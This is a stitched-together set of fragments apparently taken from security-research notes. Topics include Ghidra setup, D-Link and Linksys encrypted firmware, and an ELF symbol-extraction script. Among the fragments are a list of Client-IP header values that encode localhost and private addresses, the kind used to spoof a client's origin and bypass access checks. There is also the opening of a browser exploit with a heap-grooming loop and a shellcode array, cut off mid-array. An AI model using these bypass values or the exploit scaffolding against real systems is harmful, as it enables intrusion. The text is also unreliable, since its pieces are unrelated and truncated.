- In Ghidra's Project Tool, go to Tools -> Import Tool..., select mistyCodeBrowser.tool
- Dragging file onto the new CodeBrowser_1 in ToolChest
```
Allow: CONNECT
Allow: GET
Allow: HEAD
Allow: POST
Allow: TRACE
Client-IP: 0
Client-IP: 0177.0000.0000.0001
Client-IP: 0x7F000001
Client-IP: 10.0.0.0
Client-IP: 10.0.0.1
```
```html
<script>
function gc() {
    for (var i = 0; i < 0x80000; ++i) {
        var a = new ArrayBuffer();
    }
}
let shellcode = [
    // Move x18 to x28 (TEB)
```
The DIR-3040 models of D-Link routers ship encrypted firmware images in the most recent firmware versions. https://support.dlink.com/ProductInfo.aspx?m=DIR-3040-US details the firmware images available for this product.
- 1.11B02 - ftp://ftp2.dlink.com/PRODUCTS/DIR-3040/REVA/DIR-3040_REVA_FIRMWARE_v1.11B02.zip
- 1.02B03 - ftp://ftp2.dlink.com/PRODUCTS/DIR-3040/REVA/DIR-3040_REVA_FIRMWARE_v1.02B03.zip
Unzipping the first reveals two files:
DIR-3040_REVA_RELEASE_NOTES_v1.11B02.pdf
```bash
#!/bin/bash
# quick and dirty bash script to extract .gnu_debugdata section
# from ELF binaries to generate an IDC script that adds these
# names as symbols
# --rpw, 2020-06-21
SYMBOLFILE=debugdata_symbols.elf
if [ $# -lt 1 ]; then
    echo "you need to supply a path to a binary"
```
I recently pulled a Linksys EA4500 out of storage for evaluation. The first thing I wanted to do was to update the firmware for the device.
https://www.linksys.com/us/support-article?articleNum=148385 offers the latest version of the firmware, which is 3.1.7 as of this writing.
However, we can see from the filename that it's probably encrypted: FW_EA4500V3_3.1.7.181919_prod.gpg.img
When I run binwalk I don't get any meaningful results, confirming my suspicions:
(draft; work in progress)
See also:
- Compilers
- Program analysis:
- Dynamic analysis - instrumentation, translation, sanitizers